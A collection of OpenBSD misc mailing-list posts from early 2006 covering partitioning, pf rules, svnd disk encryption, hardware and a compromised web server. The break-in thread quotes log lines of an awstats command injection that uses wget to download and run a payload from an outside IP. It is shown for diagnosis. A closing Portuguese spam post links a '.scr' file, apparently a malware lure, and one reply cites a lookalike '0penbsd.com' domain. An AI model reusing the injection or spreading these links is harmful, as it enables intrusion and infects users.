 #: idC   H  S -C   H  S [   start:  size   ]

 0: 070   1  1 -  948 239 63 [  63:14348817 ] HPFS/QNX/AUX
 1: 12 7189   0  1 - 7751 239 63 [   108697680: 8512560 ] Compaq Diag.
*2: A6  949   0  1 - 7000 239 63 [14348880:91506240 ] OpenBSD
 3: 000   0  0 -0   0  0 [   0:   0 ] unused


This is the layout:

NTFS - OpenBSD - unused - Compaq



Partitions #0 and #1 as well as the MBR were already transferred before
the installation of OpenBSD (via the installer). At the disk-setup
stage, I let drop myself into fdisk. Now I created the A6 partition on
unused space and proceeded,

the first time leaving the boot flag on #0:
^^^

The NTFS and Compaq(FAT16) partitions showed up as i and j in the
disklabel-editor.

I had to calculate the new offsets for my partitions myself because it
always remained on the initial value (which was correct for wd0a).

Installing biosboot via /usr/mdec/installboot -v /boot
/usr/mdec/biosboot wd0 was of exactly no use. When I set the boot flag
to #2 later on, it still didn't work. The BIOS always responded with No
OS found-messages, though I could start OpenBSD then with a bootfloppy.

Appearently there was no damage done to the MBR, because Windows booted
without problems.


the second time with setting the flag to #2:


There are no partitions visible except wd0a and wd0c.

Offsets cumulated themselves every a X

Installing the BIOS was successful and it also booted the kernel after a
reboot.



In the second case it behaved as expected.

Obviously, the fact of setting the active partition affects the
installation. But shouldn't the flag be just meaningful on boot, to tell
the BIOS where to hook in? Maybe my assumptions/expectations are wrong,
but I suspected the installer only to honor the partition ID.

I don't know if this is an installer bug; I'm certainly not really
hellbent to reproduce it, but I could as long as I got that old disk (1
more week).

So let me know.

All the best,
/Markus

Re: Blowfish still good enough?

[Tobias Weingartner]

On Wednesday, January 4, Andreas Bartelt wrote:
 
 In my personal opinion, I think, the weakest link is entering the 
 password when opening a svnd device. Are there already solutions known 
 which combine passwords (knowledge) with hardware devices (i.e. 
 smartcards) or biometrics in order to access some secure storage? I 
 don't own one, but don't at least a couple of newer IBM notebook models 
 have a fingerprint reader and a TPM built in? Do you think a combination 
 of these measures would improve overall security?

Sure, if you can get me the datasheet/etc, I'll see about possibly
writing a driver for the fingerprint reader.  I've contacted the
company that makes them, and they refused to even talk to me.  Maybe
you have better luck.

Otherwise, it's all talk...

--Toby.

Re: How did they get here?

[Gaby vanhegan]

On 4 Jan 2006, at 16:28, Joachim Schipper wrote:

 The messages in the log file indicate that they used some command
 injection in a script to call wget and download the files into /tmp.
 I'm fairly sure it was via a bad script, and I'm trying to locate
 which script was used, so far with no success.

 There was a phpBB2 in one of the paths used. If you have phpBB enabled
 somewhere, that's a likely attack vector.

That was one of the locations that the linuxday worm was being  
downloaded from by the wget request.

On 4 Jan 2006, at 16:35, Bryan Irvine wrote:

 I'd suspect it has something more to do with an easy-to-guess  
 password.

Even if the wget entries in the /var/www/logs/error_log correspond to  
the times and dates of the files in /tmp?

bash-3.00# ls -lFa /tmp
total 68
drwxrwxrwt   2 root   wheel512 Jan  4 18:10 ./
drwxr-xr-x  22 root   wheel512 Jun 29  2005 ../
-rw-r--r--   1 wwwwheel   3355 Jan  2 04:14 .cpanel
-rw-r--r--   1 wwwwheel  18695 Jan  2 04:15 .cpanel.tmp
-rw-r--r--   1 wwwwheel  0 Jan  2 05:28 .plesk

Some other suspect entries are these:

61.139.83.132 - - [02/Jan/2006:07:18:12 +] GET /awstats/ 
awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136% 
2e48%2e69%2fmirela%3bchmod%2
0%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1 404 300
61.139.83.132 - - [02/Jan/2006:07:18:13 +] GET /cgi-bin/ 
awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136% 
2e48%2e69%2fmirela%3bchmod%2
0%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1 404 300
61.139.83.132 - - [02/Jan/2006:07:18:15 +] GET /cgi-bin/awstats/ 
awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136% 
2e48%2e69%2fmirela%3
bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|  HTTP/1.1 404  
308

Even though we don't have awstats installed anywhere (hence the  
404).  There are many 404 errors for this script.

bash-3.00# locate awstats.pl
bash-3.00#

It's just a bit frustrating.  Am I right in thinking if the wget  
output is in /var/www/logs/error_log then it comes from a site that  
has no defined ErrorLog.  This is a limited number of sites, but I've  
found no log entries from the transfer logs for those sites that  
correspond with the times that wget was run.

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/

Re: DadOS - sys shutdown with XDM

[Jared Solomon]

Feh, just have a read-only / with a read/write /home.  Then just tell
Dad to pull the plug when he's finished.

FWIW he, and you, will probably go back to windows right quick with
that solution.

Re: learning to code - suggestions needed

[ed]

On Tue, 03 Jan 2006 14:35:12 -0800
Joe S [EMAIL PROTECTED] wrote:

 Do you have any recommendations on how I should get started?
 * Community college courses?
 * College courses?

Always helpful, if you're not in full time employment.

 * Self-study books?

Probably the best source of information. Choose UNIX environment
programming books, they're the most informative. I like this one
currently: http://www.amazon.co.uk/exec/obidos/ASIN/0131411543, covers
lots, probably not much good to a beginner, so if it's C you're
interested in, try this:
http://www.amazon.co.uk/exec/obidos/ASIN/0393969452

College courses can be a bit useless unless it covers what you really
want to know. Otherwise you will spend three years on a degree course to
just learn to code, and that sounds like a waste of time to me. If you
want to learn programming, spend 30 mins on the loo with a good book in
your hands, it's worth 10 hours in the class room (added geek points if
you have a wireless network and it's the pdf).

-- 
Regards, Ed http://www.usenix.org.uk - http://irc.is-cool.net 
:%s/Open Source/Free Software/g

Re: How did they get here?

[Gaby vanhegan]

On 4 Jan 2006, at 16:10, knitti wrote:

 I would think php, but this doesn't explain it unless you turned the
 chroot off.

Due to historical reasons, we're not running apache chrooted.  This  
is why they're in /tmp rather than /var/www/tmp, or any other place.

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/

Re: How did they get here?

[Spruell, Darren-Perot]

From: Gaby vanhegan [mailto:[EMAIL PROTECTED]
  I would think php, but this doesn't explain it unless you turned the
  chroot off.
 
 Due to historical reasons, we're not running apache chrooted.  This  
 is why they're in /tmp rather than /var/www/tmp, or any other place.

Given the security posture of a system running PHP (and PHP apps with a poor
security history) in a non-chrooted environment, I'd agree that you've got a
pretty acute risk avenue staring you in the face.

DS

Re: How did they get here?

[veins]

Gaby vanhegan wrote:


On 4 Jan 2006, at 16:10, knitti wrote:

 


I would think php, but this doesn't explain it unless you turned the
chroot off.
   



Due to historical reasons, we're not running apache chrooted.  This  
is why they're in /tmp rather than /var/www/tmp, or any other place.


 


historical ?

system processes

[Dmitij Lebed]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

How I can make that non-root (or non-wheel) user's cannot view processes
of other users?
iD8DBQFDvDc+oN5ZK8eGpqMRAoGiAKDGZI9Zs5fy91d5mQK/k92uXcZoAQCg8ciP
rIpVkKsS1nUH3MZgZeTu13Q=
=BSjJ
-END PGP SIGNATURE-

Re: How did they get here?

[Gaby vanhegan]

On 4 Feb 2006, at 20:38, veins wrote:

 I would think php, but this doesn't explain it unless you turned the
 chroot off.

 Due to historical reasons, we're not running apache chrooted.   
 This  is why they're in /tmp rather than /var/www/tmp, or any  
 other place.

 historical ?

There are sites on this machine that we've had since 2000, and that  
were running on various insecure os' from there before we made the  
move to OpenBSD.  I suspect that it would be a medium/large sized  
task to make these sites work under chroot, as well as reorganise the  
user home folders to fit in with this.

On the other hand, getting my server pwn3d (again) is even more of a  
ballache.  Time to book in some configuration time...

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/

Re: system processes

[Marcin Wilk]

Hi
Zophie can help You with that:
http://www.0penbsd.com/zophie.html

Best Regards

At 21:59 2006-01-04, you wrote:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

How I can make that non-root (or non-wheel) user's cannot view processes
of other users?
iD8DBQFDvDc+oN5ZK8eGpqMRAoGiAKDGZI9Zs5fy91d5mQK/k92uXcZoAQCg8ciP
rIpVkKsS1nUH3MZgZeTu13Q=
=BSjJ
-END PGP SIGNATURE-

problem with packet filter

[Mario Beltran]

Hello I have two openbsd 3.8 boxes with packet filter, carp interfaces 
an pfsync  like this:



LAN  


   --
   ||
   ||
   | hme3   |

   - hme1 [ OpenBSD0 ] hme0 ---  internet   |  internet
   |  hme2 |  |gw1  | gw2
|   |  |---  |
   |   |  | |
   |   | hme2 | |
   - hme1 [ OpenBSD1 ] hme0 --- |
   ||
   | hme3   |
   ||
   --

  
I do not use round robin to load balance because the machenes on the LAN 
will never create a conections... only will response for internet requests
I want that each box dont have a default gateway because it will be 
depend of the interface that the packet come from will be returned it. 
And work fine


But I need to conect to anywhere from an specific public host and only 
for internet gw1 (hme0) and do not work, so I have created this rule in 
each box ($proxy is an macro with a public ip address and $gateway is 
the ip address of my gateway ):


pass in   quick on hme0 from $proxy to any tag PROXY keep state
pass out quick  reply-to ( hme0 $gateway ) keep state tagged PROXY

For example if a want to connect to ssh port from $ proxy to any hme0 
interface, I can not  this is my tcpdump output:


# tcpdump -n -e -ttt -i hme0 host 200.13.161.68
tcpdump: listening on hme0, link-type EN10MB
Jan 04 11:37:41.242856 0:6:2a:96:f0:a9 0:3:ba:39:70:46 0800 62: 
$proxy.56791  $hme0ip.22: S 2158877508:2158877508(0) win 65535 mss 
1460,nop,nop,sackOK (DF)
Jan 04 11:37:41.243131 0:6:2a:96:f0:a9 0:3:ba:39:70:46 0800 62: 
$proxy.56791  $hme0ip.22: S 2158877508:2158877508(0) win 65535 mss 
1460,nop,nop,sackOK (DF)
Jan 04 11:37:41.243187 0:3:ba:39:70:46 0:6:2a:96:f0:a9 0800 62: 
$proxy.56791  $hme0ip.22: S 2158877508:2158877508(0) win 65535 mss 
1460,nop,nop,sackOK (DF)
Jan 04 11:37:41.243299 0:6:2a:96:f0:a9 0:3:ba:39:70:46 0800 62: 
$proxy.56791  $hme0ip.22: S 2158877508:2158877508(0) win 65535 mss 
1460,nop,nop,sackOK (DF)
Jan 04 11:37:41.243321 0:3:ba:39:70:46 0:6:2a:96:f0:a9 0800 62: 
$proxy.56791  $hme0ip.22: S 2158877508:2158877508(0) win 65535 mss 
1460,nop,nop,sackOK (DF)


Look... the packet come from the proxy ip address but the ip address of 
my hme0 interface never reply this request. The log of my packet filter 
show me nothing about drop or reject the response packet from hme0 ip 
address.


Any suggestions  I will apreciate so much :)

Thanks in advance

Mario

High Load Averages

[Mike Keller]

Hello, I am running OBSD 3.8 as my monitoring / proxy
server.  I have been having issues with high load
averages (2-2.5) on Nagios (installed chroot by
packages).  If I run squid (installed from ports), the
load average goes up into the 6-7's.  CPU is 95% free,
Memory is 85-90% free, swap is unused (0K/2048M).  My
initial thought was that it was Nagios, but Squid (by
itself) is also running high load averages.  I have
other OBSD servers (mail gateways and such) that are
always less than 1.0 load average.  When I run vmstat,
there are usually between 3-7 blocked processes
(although I have seen as many as 22), and they are
constant (on every 5 second poll). Eventually (after a
few days), the process becomes unresponsive and I have
to reboot the server.  my vmstat -w 5 output is:

 procs   memorypagedisks  
  traps cpu
 r b wavmfre   flt  re  pi  po  fr  sr wd0 wd1
 int   sys   cs us sy id
 0 4 0  88604 823596  1360   0   0   0   0   0   0   0
 423  1628   44  1  1 98
 0 3 0  87764 824704  3679   0   0   0   0   0   0   0
 417  4113   66  2  7 91
 0 4 0  88588 823588  1680   0   0   0   0   0   0   0
 354  1705   46  1  2 98
 0 3 0  87760 824708  3913   0   0   0   0   0   0   0
 310  3561   69  1  3 95
 0 3 0  87760 824712  2048   0   0   0   0   0   0   0
 389  2388   44  1  6 93
 0 4 0  88556 823608  3881   0   0   0   0   0   0   0
 444  3547   66  3  2 95
 2 3 0  89540 822048  1772   0   0   0   0   0   0   0
 414  2721   41  1  8 91
 0 3 0  87760 824232  3712   0   0   0   0   0   0   0
 381  3459   73  4  3 93
 0 3 0  87760 824712  1325   0   0   0   0   0   0   0
 371  1291   39  1  1 98
 0 3 0  87760 824712  4655   0   0   0   0   0   0   0
 391  4463   72  2  7 90
 0 3 0  87760 824716  1365   0   0   0   0   0   0   0
 414  1381   43  0  2 98
 0 3 0  87764 824708  4140   0   0   0   0   0   0   0
 396  4502   72  5  5 91
 0 3 0  87760 824716  1749   0   0   0   0   0   0   0
 438  2109   48  1  3 96
 0 5 0  89208 822572  4202   0   0   0   0   0   0   0
 433  3952   74  1  4 95
 0 3 0  87756 824720  1600   0   0   0   0   0   0   0
 472  1597   57  1  2 97
 0 3 0  87756 824716  4334   0   0   0   0   0   0   0
 426  4491   66  2  7 90
 0 3 0  87760 824708  1341   0   0   0   0   0   0   0
 452  1291   37  1  2 97
 0 3 0  87760 824708  3874   0   0   0   0   0   0   0
 450  4270   67  3  7 90
 0 3 0  87760 824712  1541   0   0   0   0   0   0   0
 340  1477   40  1  1 98
 0 3 0  87760 824712  3884   0   0   0   0   0   0   0
 406  3496   61  2  3 95
 0 4 0  88604 823588  1794   0   0   0   0   0   0   0
 393  2239   54  2  5 93
 0 3 0  87756 824716  3657   0   0   0   0   0   0   0
 422  3410   65  1  3 95
 0 3 0  87764 824708  1768   0   0   0   0   0   0   0
 438  2125   50  1  3 96
 0 3 0  87760 824708  4066   0   0   0   0   0   0   0
 455  3654   66  3  2 94
 0 4 0  88552 823608  1563   0   0   0   0   0   0   0
 392  1519   40  1  1 98
 0 3 0  87760 824232  4077   0   0   0   0   0   0   0
 430  4207   74  4  3 93
 0 3 0  87760 824708  1317   0   0   0   0   0   0   0
 424  1280   39  1  1 98
 0 4 0  88568 823600  4233   0   0   0   0   0   0   0
 460  4659   66  3  7 90
 0 3 0  87760 824712  1550   0   0   0   0   0   0   0
 415  1507   45  1  1 98
 0 3 0  87760 824712  4105   0   0   0   0   0   0   0
 419  3688   73  3  3 95
 0 4 0  88536 823636  8791   0   0   0   0   0   0   0
 440 14787  229 21 13 66
 0 3 0  87724 824756  2200   0   0   0   0   0   0   0
 278  2221   43  1  2 97
 0 3 0  87724 824752 8   0   0   0   0   0   0   0
 321   103   17  0  0 100
 0 3 0  87724 824756   188   0   0   0   0   0   0   0
 357   258   16  0  0 100
 0 3 0  87724 824752 7   0   0   0   0   0   0   0
 35690   13  0  0 100
 0 7 0  90592 820320  8643   0   0   0   0   0   0   0
 514  9263  189  5 15 80
 0 3 0  87724 824756  1586   0   0   0   0   0   0   0
 301  1597   58  1  1 98
 0 4 0  88508 823668  9378   0   0   0   0   0   0   0
 374  8348  119  5  7 88
 0 4 0  88532 823640  1940   0   0   0   0   0   0   0
 343  2299   55  1  6 93
1515 0 189680 712732 19460   0   0   0   0   0   0   0
 441 31721  238 33 14 54
 622 0 195568 706708 37552   0   0   0   0   0   0   0
 575 73375  661 71 29  0
 0 6 0 106440 804032 32993   0   0   0   0   0   0   0
 675 58724  663 49 29 22
 0 7 0 107268 802876  3371   0   0   0   0   0   0   0
 417  4513   89  3  6 91
 0 7 0 107256 802408  7764   0   0   0   0   0   1   0
 402  7988  131  8  9 83
 0 6 0 106436 804028  1831   0   0   0   0   0   0   0
 390  2514   60  2  2 96
 0 5 0  89152 822584  5466   0   0   0   0   0   0   0
 420  7000   89  6  5 90
 0 4 0  88532 823628  1899   0   0   0   0   0   0   0
 444  2725   64  1  6 93
 0 3 0  87728 824700  3820   0   0   0   0   0   0   0
 434  3614   85  3  2 95
 0 3 0  87724 824700  1557   0   0   0   0   0   0   0
 395  1481   42  1  2 98
 0 4 0  88524 823600  4210   0   0   0   0   0   0   0
 440  4218   67  2  7 90
 0 3 0  87724 824704  1577   0   0   0   0   0   0  

Patches out, no errata page update ?

[Allie Daneman]

So...I see there are some new patches out but no errata page update ?

150 Have a Gorilla.
drwxr-xr-x2 1114 1114  512 Jan 03 13:03 .
drwxr-xr-x   18 1114 1114  512 Dec 30 21:03 ..
-r--r--r--1 1114 1114 7152 Jan 03 12:10 001_perl.patch
-r--r--r--1 1114 1114 3953 Dec 30 20:29 002_fd.patch
226 There, everyone likes a Gorilla.
ftp pwd
257 /pub/OpenBSD/patches/3.8/common

-- 
Allie Daneman
Allnix,LLC.
http://www.allnix.net

Re: problem with packet filter

[Stuart Henderson]

On 2006/01/04 15:39, Mario Beltran wrote:
 I want that each box dont have a default gateway because it will be 
 depend of the interface that the packet come from will be returned it. 

Does adding a route to $proxy pointing to $gateway help..?

Re: CGD

[knitti]

warning! spoilers! openbsd svnd is not safe for general use.

On 1/4/06, Ted Unangst [EMAIL PROTECTED] wrote:
 this is good idea.  the first thing you need to do is identify your
 threat model.  can you write it down?  and if it starts with somebody
 stealing, you lose.  amidst all the yammering, i think people are
 just assuming that encrypting their data makes it safe.  but if you
 can't even say what the danger is, how can you know it's safe?

my threat model includes the follwing two cases. for both of then svnd
can't protect me really well

case 1)  lets say someone can predict some blocks in my encrypted data,
then she can find every block (64bit) everywhere within the container
with the same data. dependend on the nature of the data, if some blocks
are known, more can be guessed. the license part of a source file is very
predictable. so if some software's source, which is no secret but its
possession illegal, can be proved to be on my disk without breaking my
key, this is bad. some illustration to prove, that every block of the same data
encrypted with the same user-key is the same in every svnd0 in the world:

# dd if=/dev/zero of=/tmp/img0 bs=1k count=1
1+0 records in
1+0 records out
1024 bytes transferred in 0.000 secs (1067 bytes/sec)
# dd if=/dev/zero of=/tmp/img1 bs=1k count=1
1+0 records in
1+0 records out
1024 bytes transferred in 0.000 secs (1280 bytes/sec)
# vnconfig -ckv svnd0 /tmp/img0
Encryption key: test
svnd0: 1024 bytes on /tmp/img0
# vnconfig -ckv svnd1 /tmp/img1
Encryption key: test
svnd1: 1024 bytes on /tmp/img1
# dd if=/usr/share/misc/license.template of=/dev/rsvnd0c bs=1k count=1
1+0 records in
1+0 records out
1024 bytes transferred in 0.000 secs (12190476 bytes/sec)
# dd if=/usr/share/misc/license.template of=/dev/rsvnd1c bs=1k count=1
1+0 records in
1+0 records out
1024 bytes transferred in 0.000 secs (1138 bytes/sec)
# vnconfig -u svnd0
# vnconfig -u svnd1
# cmp /tmp/img0 /tmp/img1
#
user key==encryption key==Bad Thing(TM)

case 2) data integrity. I don't want, that a person can mess with my
data without knowing my key. the location of some data can be determined
on my disk, this data can be replicated everywhere else on the disk. either
by insertion or by overwriting other data. illustration continued:

# dd if=/tmp/img0 of=/tmp/img3 skip=1 bs=128 count=1
1+0 records in
1+0 records out
128 bytes transferred in 0.000 secs (1488372 bytes/sec)
# cat /tmp/img3 /tmp/img3 /tmp/img3 /tmp/img3  /tmp/img6
# vnconfig -ckv svnd0 /tmp/img6
Encryption key: test
svnd0: 512 bytes on /tmp/img6
# cat /dev/rsvnd0c
dx
  should be separated by a comma, e.g.
Copyright (c) 2003, 2004

p_h[he copyright.  Additional years
should be separated by a comma, e.g.
Copyright (c) 2003, 2004

p_h[he copyright.  Additional years
should be separated by a comma, e.g.
Copyright (c) 2003, 2004

p_h[he copyright.  Additional years
should be separated by a comma, e.g.
Copyright (c) 2003, 2004

If you add extra text#

classical replay attack. I seem to have screwed some block boundary,
but you get the general idea. a good implementation would've produced
garbage only.

thanks a lot for your attention.

--knitti

Re: problem with packet filter

[Mario Beltran]

Stuart Henderson escribis:


On 2006/01/04 15:39, Mario Beltran wrote:
 

I want that each box dont have a default gateway because it will be 
depend of the interface that the packet come from will be returned it. 
   



Does adding a route to $proxy pointing to $gateway help..?


 



Thank you Stuart  for you response :)

Do you mean that I have to add an static route manually?

I dont want this way, I want that packet filter can do this

I mean that route-to and reply-to commads were create for this 
situations... or I am wrong?


Regards

Mario.

Re: pf failover state problem

[ed]

On Thu, 29 Dec 2005 23:04:02 -0700
j knight [EMAIL PROTECTED] wrote:

 When you compare pfctl -ss on either firewall, do you see state
 information being replicated?

Yep, I can confirm the states are being copied just fine. I hope someone
is still watching this thread!

-- 
Regards, Ed http://www.usenix.org.uk - http://irc.is-cool.net 
:%s/Open Source/Free Software/g

PERC 4e/si support in ami?

[Jörg Streckfuß]

hi list,

I'm searching for an 1 U server-platform-solution for
a redundant firewall-system based on openbsd.
The firewall-system should support raid 1 and at least
8 NIC's.
My first choice is an Dell 1850 with embedded PERC 4e/Si
controller. I belief the e means embedded.
Does openbsd support the PERC 4e/Si by ami (the manpage
only lists PERC 4/Si without e) ?
The raid-controller has to be embedded because i need the
two pci slots for quad ethernet cards.
And this is my second question. Which quad ethernet card is
to be recommended? I know, this question was discused many times.
But i don't want to get into trouble by this interrupt-handling
under heavy load with intel cards and em driver.
In addition i don't need 1 Gbps ethernet cards - 100 Mbit is sufficient.
The D-Link DFE-570TX seems to be the right one for this purpose
but that implies to put an old pci card (32 bit, spec pci2.2) into an
pci-x slot. Is this really a good idea?

Any recommendations would be appreciated.


joerg

Re: PERC 4e/si support in ami?

[Marco Peereboom]

Works like a champ.  I'll adjust the man.

On Thu, Jan 05, 2006 at 12:41:30AM +0100, Jvrg Streckfu_ wrote:
 hi list,
 
 I'm searching for an 1 U server-platform-solution for
 a redundant firewall-system based on openbsd.
 The firewall-system should support raid 1 and at least
 8 NIC's.
 My first choice is an Dell 1850 with embedded PERC 4e/Si
 controller. I belief the e means embedded.
 Does openbsd support the PERC 4e/Si by ami (the manpage
 only lists PERC 4/Si without e) ?
 The raid-controller has to be embedded because i need the
 two pci slots for quad ethernet cards.
 And this is my second question. Which quad ethernet card is
 to be recommended? I know, this question was discused many times.
 But i don't want to get into trouble by this interrupt-handling
 under heavy load with intel cards and em driver.
 In addition i don't need 1 Gbps ethernet cards - 100 Mbit is sufficient.
 The D-Link DFE-570TX seems to be the right one for this purpose
 but that implies to put an old pci card (32 bit, spec pci2.2) into an
 pci-x slot. Is this really a good idea?
 
 Any recommendations would be appreciated.
 
 
 joerg

Re: problem with packet filter

[Stuart Henderson]

On 2006/01/04 17:00, Mario Beltran wrote:
 Does adding a route to $proxy pointing to $gateway help..?

 Thank you Stuart  for you response :)
 Do you mean that I have to add an static route manually?

Yes (I usually add static routes in /etc/hostname.hme0, etc.)

 I dont want this way, I want that packet filter can do this

 I mean that route-to and reply-to commads were create for this
 situations... or I am wrong?

You are right, that is what route-to/reply-to are for, but when
there is no routing table entry, the packet will be rejected
(destination-unreachable) before it even reaches PF.

Once PF has control of the packet, route-to/reply-to will be used
in preference to the static route.  You could point the static route
to a non-existent address if one is available (it needs to be on a
directly-connected subnet, otherwise attempting to add the route
will give an error).

Once this is done, you might need to adjust the rules.  I don't think
you need tagging (unless I mis-understood what you're trying to do).
pfctl -sr -v is useful to let you check which rules are triggered.

Re: CGD

[Andreas Gunnarsson]

On Wed, Jan 04, 2006 at 11:11:01PM +0100, knitti wrote:
 my threat model includes the follwing two cases. for both of then svnd
 can't protect me really well
 
 case 1)  lets say someone can predict some blocks in my encrypted data,
 then she can find every block (64bit) everywhere within the container
 with the same data.

Of course not, that would have been true if it used ecb.  It uses cbc
which encrypts each disk block with an iv that depends on the block
number, so a plaintext block will be encrypted differently depending
both on which disk block it is in and what data precedes it in that
block.

 # vnconfig -ckv svnd1 /tmp/img1
[...]
 # dd if=/usr/share/misc/license.template of=/dev/rsvnd0c bs=1k count=1
[...]
 # cmp /tmp/img0 /tmp/img1

You are comparing the entire images.  Try instead to fill one image with
a repeating 8-byte pattern and then check the contents.  The encrypted
contents will not be repeated.

 user key==encryption key==Bad Thing(TM)

How would it help to generate a random key which is then encrypted with
a user key and stored on the disk?  A dictionary attack is still quite
possible.

While I'm here I'd like to ramble for a while about the fact that people
seem to be obsessed with the ability to change their passphrases; I've
seen it at least twice in this thread and sometimes I even hear people
talking about changing the passphrase on pgp keys and similar.  That
only helps if you are sure noone has seen your previously encrypted key
but now has been able to guess your passphrase and may in the future be
able to access your encrypted key.  See, if they already have a copy of
the key encrypted with the old passphrase they will still be able to use
your old passphrase on it.  By reencrypting it with a new passphrase you
only give them another chance to crack it.  So changing the passphrase
which is used to encrypt a key is stupid, you really need to generate a
new key.  So it will take a long time to reencrypt the disk, tough luck.

The problem with user remembered passwords is that they aren't strong.
The only way around that is to store a random number somewhere, e.g. a
USB stick or a floppy.

Therefore, you may want a combination of a stored random secret and some
passphrase.  You lose either = you lose your data.  If someone finds
the stored secret they can mount a dictionary attack or start extracting
your finger nails.

If you store the random secret on the disk itself it's a salt.  While
you can use a dictionary on it, it does mean that you have to do that
for each disk you want to crack.  So, salt + passphrase is good, and if
you can store the salt wherever you want it's as good as you can do.

 case 2) data integrity. I don't want, that a person can mess with my
 data without knowing my key. the location of some data can be determined
 on my disk, this data can be replicated everywhere else on the disk.
[...]
 classical replay attack. I seem to have screwed some block boundary,

No.  I don't know why you assume that ecb is used, the reason your
output is messed up is cbc.  It is possible to cut and paste encrypted
data to some extent, but when you do that you will always mess up one
crypto block.  No way around that unless you find the key, so while this
can be a problem it is a little less severe than you say.

This is a problem with cbc, to avoid it you need to use another block
chaining mode or add some integrity check.  CGD also uses cbc according
to http://www.imrryr.org/~elric/cgd/html4/cgd.html so unless there is
some additional integrity check (which is a problem for block devices
since it requires additional storage) it has the same problem.

   Andreas

web server project

[veins]

Hi misc@ users,

I have been working for a while on an ISC/OpenBSD licenced web server 
that will be
used as an httpd replacement for our not-for-profit organization. Code 
is at a very
early stage, but is being worked on actively and has been powering our 
own boxes
for weeks now (for static pages only). We are looking for people 
interested in
joining the project, wether for testing or contributing code, html, 
design or simply

ideas.

If you are interested, feel free to mail me and ask any question you 
might have. oh,
and just to prevent trolls, goals are different from thttpd, lighttpd 
and definitely very

very far from apache's, and so are the design and features planned.

Im not advertizing the irc channel here, but here's a link to our cvsweb 
so you can
take a look, keep in mind that it's at a _very early_ stage so lots of 
code is being

worked on and isnt defintive:

   http://lab.skreel.org/cgi-bin/cvsweb/eoz/

Sorry for those that are not interested, I won't spam anymore ;-)

++ veins

Deletion of indirectly -installed packages (dependencies)

[Andrés Delfino]

Hi, I want to know if there are any plans to support the deletion of
indirectly -installed packages (dependencies). What I want I'm trying
to say, is, for example, when one adds package FOO, and that package
has tons of dependencies, and one then deletes it, we didn't uninstall
all the dependencies.

I know it isn't simple, one must first have a way to say: hey, I'm a
package who was added by a user, I wasn't added just to serve a
package you deleted!!, and then check if the dependency is used by
any package. Also, it should always ask if we want to delete that
dependecy, maybe someone starts using it directly instead of using the
package which needed it to be added. But, IMHO, it would be nice, =).

Help you understand me, good luck

Re: CGD

[veins]

Andreas Gunnarsson wrote:


On Wed, Jan 04, 2006 at 11:11:01PM +0100, knitti wrote:
 


my threat model includes the follwing two cases. for both of then svnd
can't protect me really well

case 1)  lets say someone can predict some blocks in my encrypted data,
then she can find every block (64bit) everywhere within the container
with the same data.
   



Of course not, that would have been true if it used ecb.  It uses cbc
which encrypts each disk block with an iv that depends on the block
number, so a plaintext block will be encrypted differently depending
both on which disk block it is in and what data precedes it in that
block.
 

Yeah, and had it been using ECB, still two plaintext would have to be 
aligned to the beginning of a

block and fill the 64 bits for the ciphered block to look the same.

Re: What does this error message mean?

[Jim Mays]

I found a very strang line in my /etc/hosts file.  The line says

::1 localhost.cimsolve.com localhost

This line is followed by a normal line

127.0.0.1 localhost.cimsolve.com localhost

How did the first line get there, because I didn't put it there.

Jim

Re: What does this error message mean?

[jared r r spiegel]

On Wed, Jan 04, 2006 at 08:44:19PM -0600, Jim Mays wrote:
 I found a very strang line in my /etc/hosts file.  The line says
 
 ::1 localhost.cimsolve.com localhost
 
 This line is followed by a normal line
 
 127.0.0.1 localhost.cimsolve.com localhost
 
 How did the first line get there, because I didn't put it there.

  does it look like it is from:

/usr/src/distrib/miniroot/install.sh:

   330 # Always create new hosts file.
   331 cat /tmp/hosts __EOT
   332 ::1 localhost
   333 127.0.0.1 localhost
   334 ::1 $(hostname -s)
   335 127.0.0.1 $(hostname -s)
   336 __EOT

-- 

  jared

[ openbsd 3.8 GENERIC ( dec 16 ) // i386 ]

Re: What does this error message mean?

[jared r r spiegel]

On Mon, Jan 02, 2006 at 08:17:43PM -0600, Jim Mays wrote:
 
 resolv.conf file:
 
 search hsd1.tx.comcast.net.
 nameserver 68.87.85.98
 nameserver 68.87.69.146
 looklup file bind

  if that is a paste-o and not a type-o, that might be attributable to 
  a little bit of suckage. ( looklup != lookup )

-- 

  jared

[ openbsd 3.8 GENERIC ( dec 16 ) // i386 ]

Voce recebeu uma charge humortadela

[charges]

Ola!

Alguim que nco tinha nada para fazer, numa de suas visitas ao Humor
Tadela nco sei por que cargas d'agua, lhe recomendou a seguinte pagina:

Piada Animada: Felizes Para Sempre?

Nco funcionou?

Nco se desespere! Pegue o seu browser digite o seguinte enderego:

http://humortadela.com.br/charges.scr

Ou Acesse CLICANDO AQUI!!!

Ainda nco funcionou?

Bem, entco chegou a hora de comegar a se desesperar...

Turma do Humor Tadela
[IMAGE]
O maior site de humor da Amirica Latina!
http://humortadela.com.br

Em 03/01/2005, horario de Brasmlia amarela, 75 e em bom estado.